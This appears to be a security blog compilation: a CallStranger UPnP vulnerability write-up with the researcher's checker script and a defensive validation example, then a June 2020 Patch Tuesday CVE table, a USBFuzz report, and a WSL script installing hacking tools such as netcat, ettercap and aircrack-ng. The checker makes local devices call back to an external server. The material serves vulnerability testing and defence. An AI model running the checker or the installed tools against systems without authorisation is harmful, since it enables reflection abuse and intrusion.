
New CallStranger exploit takes advantage of UPnP vulnerability in millions of routers, gaming systems, TVs, printers, and other Internet-connected attachable devices.

New CallStranger exploit takes advantage of UPnP vulnerability

Researchers just announced the discovery of a UPnP vulnerability that impacts any UPnP device exposed on the Internet. The attack, called CallStranger (CVE-2020-12695), is being used for massive DDoS attacks, to exfiltrate data, and to scan ports from Internet-facing UPnP devices.

How the CallStranger exploit works

The attack abuses the CALLBACK header value of the UPnP SUBSCRIBE request, so as a protection you can block all SUBSCRIBE and NOTIFY HTTP packets in both ingress and egress traffic. DDoS protection can be configured to block NOTIFY packets too.

You can also disable UPnP services on cameras, printers, routers, and other connected devices if the product provides the means to do so. Some products also list UPnP ports used. If so, you could block those too (or use Nmap to discover the open ports if no documentation is available).

SUBSCRIBE publisher_path HTTP/1.1
HOST: publisher_host:publisher_port
CALLBACK:
NT: upnp:event
TIMEOUT: Second-requested subscription duration
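As an added example (not code from this post or from the CallStranger project), here is the check a device firmware or an inline proxy would apply to that request: pull every URL out of the CALLBACK header and refuse the subscription unless every callback host is a literal address on the device's own subnet. The local network 192.168.1.0/24 and the two sample requests are constructed for the example.

```python
"""Defender-side validation of UPnP SUBSCRIBE callbacks (CallStranger).

Added example, not part of the original post or the CallStranger
repository. A device that honours any CALLBACK URL will send NOTIFY
traffic wherever it is told to; restricting callbacks to the local
network is the fix that closes the reflection/exfiltration path.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Hosts the device may legitimately notify: its own LAN. Constructed
# assumption for the example; a real device reads this from its
# interface configuration.
LOCAL_NETWORKS = [ipaddress.ip_network("192.168.1.0/24")]

# UPnP wraps each callback URL in angle brackets: <url><url>
CALLBACK_URL_RE = re.compile(r"<([^>]*)>")


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, target, headers).

    Header names are folded to upper case because UPnP stacks send
    them in mixed case (CALLBACK, Callback, callback).
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().upper()] = value.strip()
    return method, target, headers


def callback_urls(headers):
    """Return every URL carried in the CALLBACK header (may be several)."""
    return CALLBACK_URL_RE.findall(headers.get("CALLBACK", ""))


def host_is_local(url, networks=LOCAL_NETWORKS):
    """True only if the URL names a literal IP inside an allowed network.

    Hostnames are rejected outright: most UPnP stacks do not accept
    them anyway, and resolving one would let DNS decide the answer.
    """
    try:
        addr = ipaddress.ip_address(urlsplit(url).hostname)
    except (ValueError, TypeError):
        return False
    return any(addr in net for net in networks)


def check_subscribe(raw: bytes, networks=LOCAL_NETWORKS):
    """Classify one request as ('accept'|'reject'|'ignore', bad_urls).

    'ignore' covers anything that is not a new subscription, e.g. a
    renewal that carries only a SID and no CALLBACK header.
    """
    method, _target, headers = parse_request(raw)
    if method != "SUBSCRIBE" or "CALLBACK" not in headers:
        return "ignore", []
    urls = callback_urls(headers)
    bad = [u for u in urls if not host_is_local(u, networks)]
    if not urls or bad:
        return "reject", bad
    return "accept", []


# Constructed sample traffic: a subscription from a LAN control point,
# and one whose second callback points at an Internet host, which is
# exactly what turns the device into a reflector.
BENIGN = (b"SUBSCRIBE /upnp/event/WANIPConn1 HTTP/1.1\r\n"
          b"HOST: 192.168.1.1:5000\r\n"
          b"CALLBACK: <http://192.168.1.20:49152/notify>\r\n"
          b"NT: upnp:event\r\n"
          b"TIMEOUT: Second-1800\r\n\r\n")
SUSPICIOUS = (b"SUBSCRIBE /upnp/event/WANIPConn1 HTTP/1.1\r\n"
              b"HOST: 192.168.1.1:5000\r\n"
              b"CALLBACK: <http://192.168.1.20:49152/a><http://203.0.113.9/x>\r\n"
              b"NT: upnp:event\r\n"
              b"TIMEOUT: Second-1800\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, check_subscribe(req))
```

The same logic, applied to NOTIFY requests leaving the network, is the egress rule the post recommends: a NOTIFY whose destination is not on the LAN should never be emitted.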

Researchers were able to confirm that the following devices are susceptible to attack. They are awaiting confirmation on another 14 devices. Thus far in their testing, only 2 devices have been found not to be vulnerable.

  • Windows 10 (Probably all Windows versions including servers) – upnphost.dll 10.0.18362.719
  • Xbox One- OS Version 10.0.19041.2494
  • ADB TNR-5720SX Box (TNR-5720SX/v16.4-rc-371-gf5e2289 UPnP/1.0 BH-upnpdev/2.0)
  • Asus ASUS Media Streamer
  • Asus RT-N66U Firmware: 3.0.0.4.382_51640-g679a7e3
  • Asus Rt-N11
  • Belkin WeMo
  • Broadcom ADSL Modems
  • Canon Canon SELPHY CP1200 Printer
  • Cisco X1000 – (LINUX/2.4 UPnP/1.0 BRCM400/1.0)
  • Cisco X3500 – (LINUX/2.4 UPnP/1.0 BRCM400/1.0)
  • D-Link DVG-N5412SP WPS Router (OS 1.0 UPnP/1.0 Realtek/V1.3)
  • EPSON EP, EW, XP Series (EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0)
  • HP Deskjet, Photosmart, Officejet ENVY Series (POSIX, UPnP/1.0, Intel MicroStack/1.0.1347)
  • Huawei HG255s Router – Firmware HG255sC163B03 (ATP UPnP Core)
  • JRiver DLNA Server 19.0.163 (Windows, UPnP/1.1 DLNADOC/1.50, JRiver/19)
  • NEC AccessTechnica WR8165N Router ( OS 1.0 UPnP/1.0 Realtek/V1.3)
  • Philips 2k14MTK TV – Firmware TPL161E_012.003.039.001
  • Samsung UE55MU7000 TV – Firmware T-KTMDEUC-1280.5, BT – S
  • Samsung MU8000 TV
  • TP-Link TL-WA801ND (Linux/2.6.36, UPnP/1.0, Portable SDK for UPnP devices/1.6.19)
  • TP-Link Archer VR200 (Linux/2.6.32.42, UPnP/1.0, Portable SDK for UPnP devices/1.6.19)
  • Trendnet TV-IP551W (OS 1.0 UPnP/1.0 Realtek/V1.3)
  • Zyxel VMG8324-B10A (LINUX/2.6 UPnP/1.0 BRCM400-UPnP/1.0)

Here is a script that can scan subnets for the vulnerability.

import os
import sys
import socket
import time
import requests
import upnpy
from cryptography.fernet import Fernet
from termcolor import colored

# Enable ANSI colour codes on the Windows console
if sys.platform == 'win32':
    os.system('color')

print('This script created by Yunus Çadırcı (https://twitter.com/yunuscadirci) to check against CallStranger (CVE-2020-12695) vulnerability. An attacker can use this vulnerability for:')
print('* Bypassing DLP for exfiltrating data')
print('* Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood')
print('* Scanning internal ports from Internet facing UPnP devices')
print('You can find detailed information on https://www.callstranger.com  https://kb.cert.org/vuls/id/339275 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12695')
print('Slightly modified version of https://github.com/5kyc0d3r/upnpy used for base UPnP communication')


def subscribe(URL, callbackURL):
    """Send a UPnP SUBSCRIBE to a service's event URL with CALLBACK pointing at callbackURL."""
    myheaders = {
        'User-Agent': 'Callstranger Vulnerability Checker',
        'CALLBACK': '<' + callbackURL + '>',
        'NT': 'upnp:event',
        'TIMEOUT': 'Second-300'}
    req = requests.request('SUBSCRIBE', URL, headers=myheaders)
    if req.status_code == 200:
        print(colored('Subscribe to ' + URL + ' seems successful', 'green'))
    else:
        print(colored('Subscribe to ' + URL + ' failed with status code:' + str(req.status_code), 'red'))
    print(req.headers)
    print(req.text)


def getsession(path):
    """Obtain a session token from the verification server."""
    session = ''
    try:
        getses = requests.request('PUT', path)
        session = getses.text
        print(colored('Successfully get session:' + session, 'green'))
    except requests.RequestException:
        print(colored('Could not contact server ' + path + ' for vulnerability confirmation', 'red'))
    return session


def Diff(li1, li2):
    """Symmetric difference of two lists, preserving order."""
    return [i for i in li1 + li2 if i not in li1 or i not in li2]


def confirmvulnerableservices(path, key):
    """Fetch the encrypted list of services that called the server back and decrypt it locally."""
    try:
        getservices = requests.request('PUT', path)
        vulnerableservices = getservices.text
        print(colored('Successfully get services from server: ' + path, 'green'))
        print('')
        print('Encrypted vulnerable services:')
        print(vulnerableservices)
        print('')
        print('Decrypting vulnerable services with key:', key)
        f = Fernet(key)
        decryptedvulnerableservices = []
        print(colored('\nVerified vulnerable services: ', 'red'))
        for i, line in enumerate(vulnerableservices.splitlines(), 1):
            service = f.decrypt(line.encode()).decode()
            print(colored(str(i) + ':\t' + service, 'red'))
            decryptedvulnerableservices.append(service)

        # Services that were subscribed to but never called the server back
        unverifiedservices = Diff(services, decryptedvulnerableservices)

        print(colored('\nUnverified services: ', 'yellow'))
        for i, unverifiedservice in enumerate(unverifiedservices, 1):
            print(colored(str(i) + ':\t' + unverifiedservice, 'yellow'))
    except Exception as exc:
        print(colored('Could not get services from server ' + path + ' for vulnerability confirmation: ' + str(exc), 'red'))


services = []
dummyservicekeywords = ['dummy', 'notfound']
# this host must be external so you can be sure that devices are vulnerable. Most of UPnP stacks don't allow hostname. use IP if possible
StrangerHost = 'http://' + socket.gethostbyname('verify.callstranger.com')
StrangerPort = '80'
getSessionPath = '/CallStranger.php?c=getsession'
putServicePath = '/CallStranger.php?c=addservice&service='  # this HTTP request verb is NOTIFY , your web server must respond to NOTIFY
getVulnerableServicesPath = '/CallStranger.php?c=getservices'
print('Stranger Host:', StrangerHost)
print('Stranger Port:', StrangerPort)

upnp = upnpy.UPnP()

# Discover UPnP devices on the local network via SSDP
devices = upnp.discover()
if len(devices) > 0:
    print(colored(str(len(devices)), 'blue'), colored(' devices found:', 'blue'))

    for device in devices:
        print('\n', colored(device.friendly_name, 'yellow'), device.base_url, '(', device.document_location, ')')
        tmpservices = device.get_services()
        print(colored('\n  ' + str(len(tmpservices)) + ' service(s) found for ' + device.friendly_name, 'yellow'))
        for tmpservice in tmpservices:
            print('    ', tmpservice.service, '\t-->', device.base_url + tmpservice.event_sub_url)
            if any(x in tmpservice.event_sub_url for x in dummyservicekeywords):
                print('     --skipping ', device.base_url + tmpservice.event_sub_url, 'because it contains dummy service keywords')
            else:
                services.append(device.base_url + tmpservice.event_sub_url)

    print('\n', 'Total', len(services), 'service(s) found. do you want to continue to VERIFY if service(s) are vulnerable?')
    print(colored('Be careful: This operation needs Internet access and may transfer data about devices over network. Data encrypted on local and we can not see which services are vulnerable but ISPs and other elements may be able to inspect HTTP headers created by UPnP device. Because most of UPnPstack do not allow SSL connection we can not use it. ', 'red'))
    if input('Do you want to continue? y/N ') == 'y':
        ss = getsession(StrangerHost + ':' + StrangerPort + getSessionPath)
        key = Fernet.generate_key()
        f = Fernet(key)
        print('Symmetric random key for encryption:', key, ' We do not send this value to server so we can not see which services are vulnerable. All confirmation process is done on client side')
        for serv in services:
            # The service URL travels encrypted inside the callback path; only this client holds the key
            path = StrangerHost + ':' + StrangerPort + putServicePath + f.encrypt(serv.encode()).decode() + '&token=' + ss
            print('Calling stranger for ', serv, 'with', path)
            subscribe(serv, path)

        print(colored('\n\tWaiting 5 second for asynchronous requests', 'yellow'))
        time.sleep(5)
        vulnerabilityconfirmationpath = StrangerHost + ':' + StrangerPort + getVulnerableServicesPath + '&token=' + ss
        confirmvulnerableservices(vulnerabilityconfirmationpath, key)
else:
    print(colored('No UPnP device found. Possible reasons: ', 'yellow'))
    print(colored('* You just connected to network.', 'yellow'))
    print(colored('* UPnP stack is too slow. Restart this script', 'yellow'))
    print(colored('* UPnP is disabled on OS.', 'yellow'))
    print(colored('* UPnP is disabled on devices.', 'yellow'))
    print(colored('* There is no UPnP supported device.', 'yellow'))
    print(colored('* Your OS works on VM with NAT configuration.', 'yellow'))

Sources: GitHub/CallStranger


Microsoft’s Patch Tuesday breaks record with 129 patches including CVEs for 11 critical remote-code execution vulnerabilities.


If your computer took forever to reboot, here’s why. Microsoft rolled out patches for a whopping 129 vulnerabilities in June’s Patch Tuesday. The patches covered vulnerabilities in Windows 10, Office, Microsoft Edge, and other Microsoft software. It marked the 4th month in a row that MS released patches for more than 110 CVEs. MS has already patched 616 CVEs – and it’s only June!

One patch in particular, CVE-2020-1299 in Windows 10, stands out from the rest as it could allow remote code execution when a .LNK file, which is a shortcut or “link”, is processed. If an attacker were to embed a malicious shortcut in a removable drive or remote share and convince a user to open it, the malicious binary could execute code.

Here’s the full list.

CVE | Title | Severity | Public | Exploited | XI – Latest | XI – Older | Type
CVE-2020-1248 | GDI+ Remote Code Execution Vulnerability | Critical | No | No | 2 | 2 | RCE
CVE-2020-1299 | LNK Remote Code Execution Vulnerability | Critical | No | No | 2 | 2 | RCE
CVE-2020-1219 | Microsoft Browser Memory Corruption Vulnerability | Critical | No | No | 1 | 1 | RCE
CVE-2020-1181 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Critical | No | No | 2 | 2 | RCE
CVE-2020-1073 | Scripting Engine Memory Corruption Vulnerability | Critical | No | No | 2 | 2 | RCE
CVE-2020-1213 | VBScript Remote Code Execution Vulnerability | Critical | No | No | 1 | 1 | RCE
CVE-2020-1216 | VBScript Remote Code Execution Vulnerability | Critical | No | No | 1 | 1 | RCE
CVE-2020-1260 | VBScript Remote Code Execution Vulnerability | Critical | No | No | 1 | 1 | RCE
CVE-2020-1281 | Windows OLE Remote Code Execution Vulnerability | Critical | No | No | 2 | 2 | RCE
CVE-2020-1300 | Windows Remote Code Execution Vulnerability | Critical | No | No | 2 | 2 | RCE
CVE-2020-1286 | Windows Shell Remote Code Execution Vulnerability | Critical | No | No | 2 | 2 | RCE
CVE-2020-1311 | Component Object Model Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1211 | Connected Devices Platform Service Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1120 | Connected User Experiences and Telemetry Service Denial of Service Vulnerability | Important | No | No | 2 | 2 | DoS
CVE-2020-1244 | Connected User Experiences and Telemetry Service Denial of Service Vulnerability | Important | No | No | 2 | 2 | DoS
CVE-2020-1202 | Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1203 | Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1257 | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1278 | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1293 | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1317 | Group Policy Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1315 | Internet Explorer Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1208 | Jet Database Engine Remote Code Execution Vulnerability | Important | No | No | 2 | 2 | RCE
CVE-2020-1236 | Jet Database Engine Remote Code Execution Vulnerability | Important | No | No | 2 | 2 | RCE
CVE-2020-1232 | Media Foundation Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1238 | Media Foundation Memory Corruption Vulnerability | Important | No | No | 2 | 2 | RCE
CVE-2020-1239 | Media Foundation Memory Corruption Vulnerability | Important | No | No | 2 | 2 | RCE
CVE-2020-1329 | Microsoft Bing Search Spoofing Vulnerability | Important | No | No | 2 | 2 | Spoof
CVE-2020-1220 | Microsoft Edge (Chromium-based) in IE Mode Spoofing Vulnerability | Important | No | No | 2 | 2 | Spoof
CVE-2020-1242 | Microsoft Edge Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1225 | Microsoft Excel Remote Code Execution Vulnerability | Important | No | No | 2 | 2 | RCE
CVE-2020-1226 | Microsoft Excel Remote Code Execution Vulnerability | Important | No | No | 2 | 2 | RCE
CVE-2020-1160 | Microsoft Graphics Component Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1321 | Microsoft Office Remote Code Execution Vulnerability | Important | No | No | 2 | 2 | RCE
CVE-2020-1177 | Microsoft Office SharePoint XSS Vulnerability | Important | No | No | 2 | 2 | XSS
CVE-2020-1183 | Microsoft Office SharePoint XSS Vulnerability | Important | No | No | 2 | 2 | XSS
CVE-2020-1297 | Microsoft Office SharePoint XSS Vulnerability | Important | No | No | 2 | 2 | XSS
CVE-2020-1298 | Microsoft Office SharePoint XSS Vulnerability | Important | No | No | 2 | 2 | XSS
CVE-2020-1318 | Microsoft Office SharePoint XSS Vulnerability | Important | No | No | 2 | 2 | XSS
CVE-2020-1320 | Microsoft Office SharePoint XSS Vulnerability | Important | No | No | 2 | 2 | XSS
CVE-2020-1229 | Microsoft Outlook Security Feature Bypass Vulnerability | Important | No | No | 2 | 2 | SFB
CVE-2020-1322 | Microsoft Project Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1295 | Microsoft SharePoint Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1178 | Microsoft SharePoint Server Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1148 | Microsoft SharePoint Spoofing Vulnerability | Important | No | No | 2 | 2 | Spoof
CVE-2020-1289 | Microsoft SharePoint Spoofing Vulnerability | Important | No | No | 2 | 2 | Spoof
CVE-2020-1222 | Microsoft Store Runtime Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1309 | Microsoft Store Runtime Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1163 | Microsoft Windows Defender Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1170 | Microsoft Windows Defender Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1340 | NuGetGallery Spoofing Vulnerability | Important | No | No | 2 | 2 | Spoof
CVE-2020-1212 | OLE Automation Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1292 | OpenSSH for Windows Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1323 | SharePoint Open Redirect Vulnerability | Important | No | No | 2 | 2 | Spoof
CVE-2020-1331 | System Center Spoofing Vulnerability | Important | No | No | 2 | 2 | Spoof
CVE-2020-1327 | Team Foundation Server HTML Injection Vulnerability | Important | No | No | 2 | 2 | Spoof
CVE-2020-1214 | VBScript Remote Code Execution Vulnerability | Important | No | No | 1 | 1 | RCE
CVE-2020-1215 | VBScript Remote Code Execution Vulnerability | Important | No | No | 1 | 1 | RCE
CVE-2020-1230 | VBScript Remote Code Execution Vulnerability | Important | No | No | 1 | 1 | RCE
CVE-2020-1343 | Visual Studio Code Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1207 | Win32k Elevation of Privilege Vulnerability | Important | No | No | 1 | 1 | EoP
CVE-2020-1247 | Win32k Elevation of Privilege Vulnerability | Important | No | No | 1 | 1 | EoP
CVE-2020-1251 | Win32k Elevation of Privilege Vulnerability | Important | No | No | 1 | 1 | EoP
CVE-2020-1253 | Win32k Elevation of Privilege Vulnerability | Important | No | No | 1 | 1 | EoP
CVE-2020-1258 | Win32k Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1310 | Win32k Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1290 | Win32k Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1255 | Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1271 | Windows Backup Service Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1280 | Windows Bluetooth Service Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1283 | Windows Denial of Service Vulnerability | Important | No | No | 2 | 2 | DoS
CVE-2020-1296 | Windows Diagnostics & feedback Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1162 | Windows Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1324 | Windows Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1234 | Windows Error Reporting Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1261 | Windows Error Reporting Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1263 | Windows Error Reporting Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1197 | Windows Error Reporting Manager Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1199 | Windows Feedback Hub Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-0915 | Windows GDI Elevation of Privilege Vulnerability | Important | No* | No | 2 | 2 | EoP
CVE-2020-0916 | Windows GDI Elevation of Privilege Vulnerability | Important | No* | No | 2 | 2 | EoP
CVE-2020-1348 | Windows GDI Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1259 | Windows Host Guardian Service Security Feature Bypass Vulnerability | Important | No | No | 2 | 2 | SFB
CVE-2020-1272 | Windows Installer Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1277 | Windows Installer Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1302 | Windows Installer Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1312 | Windows Installer Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-0986 | Windows Kernel Elevation of Privilege Vulnerability | Important | No* | No | 2 | 2 | EoP
CVE-2020-1237 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1246 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1262 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1264 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1266 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1269 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1273 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1274 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1275 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1276 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1307 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1316 | Windows Kernel Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1241 | Windows Kernel Security Feature Bypass Vulnerability | Important | No | No | 1 | 1 | SFB
CVE-2020-1279 | Windows Lockscreen Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1204 | Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1254 | Windows Modules Installer Service Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1291 | Windows Network Connections Service Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1209 | Windows Network List Service Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1201 | Windows Now Playing Session Manager Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1196 | Windows Print Configuration Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1194 | Windows Registry Denial of Service Vulnerability | Important | No | No | 2 | 2 | DoS
CVE-2020-1231 | Windows Runtime Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1233 | Windows Runtime Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1235 | Windows Runtime Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1265 | Windows Runtime Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1282 | Windows Runtime Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1304 | Windows Runtime Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1306 | Windows Runtime Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1334 | Windows Runtime Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1217 | Windows Runtime Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1268 | Windows Service Information Disclosure Vulnerability | Important | No | No | 2 | 2 | Info
CVE-2020-1301 | Windows SMB Remote Code Execution Vulnerability | Important | No | No | 1 | 1 | RCE
CVE-2020-1284 | Windows SMBv3 Client/Server Denial of Service Vulnerability | Important | No | No | 1 | 1 | DoS
CVE-2020-1206 | Windows SMBv3 Client/Server Information Disclosure Vulnerability | Important | No | No | 1 | 1 | Info
CVE-2020-1305 | Windows State Repository Service Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1314 | Windows Text Service Framework Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1313 | Windows Update Orchestrator Service Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1287 | Windows WalletService Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1294 | Windows WalletService Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1270 | Windows WLAN Service Elevation of Privilege Vulnerability | Important | No | No | 2 | 2 | EoP
CVE-2020-1223 | Word for Android Remote Code Execution Vulnerability | Important | No | No | 2 | 2 | RCE

Table: CVEs released by Microsoft for June 2020 (XI = exploitability index; "No*" marks entries the source footnoted).


Forget the 26 new USB bugs found in Linux and Windows, it’s the security fuzzer tool that discovered them that’s the news.


A research team from Purdue University has created a tool, USBFuzz, which fuzzes calls to the USB driver stack. Apparently the tool is pretty groundbreaking. The researchers said,

“At its core, USBFuzz uses a software-emulated USB device to provide random device data to drivers (when they perform IO operations).”

The researchers tested the tool on:

  • 9 recent versions of the Linux kernel: v4.14.81, v4.15, v4.16, v4.17, v4.18.19, v4.19, v4.19.1, v4.19.2, and v4.20-rc2 (the latest version at the time of evaluation)
  • FreeBSD 12 (the latest release)
  • MacOS 10.15 Catalina (the latest release)
  • Windows (both version 8 and 10, with most recent security updates installed)

In total, they found 26 new bugs. They discovered one new bug in FreeBSD, three in MacOS (one of which froze the system), four in Windows 8 and 10 (producing BSOD), and get this, 18 in Linux. Sixteen of the Linux bugs were “memory bugs of high-security impact in various Linux subsystems”. Of the 18 Linux bugs, 11 received a CVE and have already been patched.

The team’s research results will be presented at the Usenix Security Symposium virtual security conference in August 2020. Then USBFuzz will be open-sourced and released to the public.


Windows Subsystem for Linux (WSL) – how to create a Linux hacking toolkit that runs on Windows 10


Forget running Kali in a virtual machine (well, at least put it aside for a while). The Windows 10 Anniversary Update includes a whack new feature – Windows Subsystem for Linux or WSL. Using the new LxssManager service, WSL lets you run a full-featured Ubuntu Linux subsystem on Windows 10. As Microsoft says,

“The LXSS Manager supports running native ELF binaries.”

Pick yourself up off the floor.  That means a cool little Linux console window and the ability to use APT to install all your favorite Linux hacking tools. The subsystem is kept separate from the Windows core OS which is a plus (however, you can still access your root Windows drive under /mnt).  Even better,  the home directory is maintained even when you uninstall/install the system so you can wipe the system and start anew without losing anything.

Heads up though, it’s marked “beta” and although it seems much cleaner than you’d expect from a beta product, there are some things that don’t work – ICMP and raw sockets for instance. This means one of your favorite hacking tools, nmap, won’t run correctly. I’ve heard however, that this has been given a high priority with MS developers so hopefully we see a fully-functioning, comprehensive networking system very soon.

How to install Windows Subsystem for Linux (WSL)

To get started with Windows Subsystem for Linux (WSL), first install the Windows feature (Control Panel – Programs and Features – Turn Windows features on or off).

[Screenshot: the Windows Subsystem for Linux (Beta) entry in the Turn Windows features on or off dialog]

Next, reboot the computer to initialize and start the newly installed LxssManager service.

Then click Start and type “bash”. Within the console window, you will be prompted to accept a license agreement. Press “y”. The subsystem will download from the Windows Store (actually, it says it’s downloading from the Windows Store but it’s really coming off of MS cloud servers), extract, and install. Once the installation is complete, it will prompt you for a new Unix username and password.

Once the Linux subsystem is installed, search for “bash” again and you’ll see the new Bash application with a nice little Ubuntu-like icon. Pin it to your start menu or your task bar and right-click to set properties (e.g. font size, window size, colors, etc.). Open a bash shell window or two and start installing your tools using apt.

Below is a bash shell script you can copy to your home directory, chmod to 700, and run to install a starting set of utilities.  Remember, if you save this in your home directory, it’ll be retained even when you reinstall the Linux subsystem.

Shell script to install basic hacking utilities in Windows Subsystem for Linux

This script will install some basic hacking utilities including w3af (including python), git, and katoolin (Kali Linux repository utility), and the basics needed for a private VPN service and Metasploit. Don’t forget to chmod 700 the script first. Then run with sudo ./YOUR_SCRIPT_FILE.sh.

#!/bin/bash
# Refresh the package index and bring the base system up to date first.
# -y answers the apt prompts so the script can run unattended.
sudo apt-get update
sudo apt-get -y upgrade
sudo apt-get -y dist-upgrade

# Network, wireless and web-testing tools (installed one by one so a
# package that is missing from the Ubuntu repositories does not stop the rest)
sudo apt-get -y install nmap
sudo apt-get -y install netcat
sudo apt-get -y install aircrack-ng
sudo apt-get -y install dsniff
sudo apt-get -y install ettercap-text-only
sudo apt-get -y install w3af
sudo apt-get -y install kismet
sudo apt-get -y install scapy
sudo apt-get -y install john
sudo apt-get -y install unzip
sudo apt-get -y install nikto
sudo apt-get -y install tor
sudo apt-get -y install git

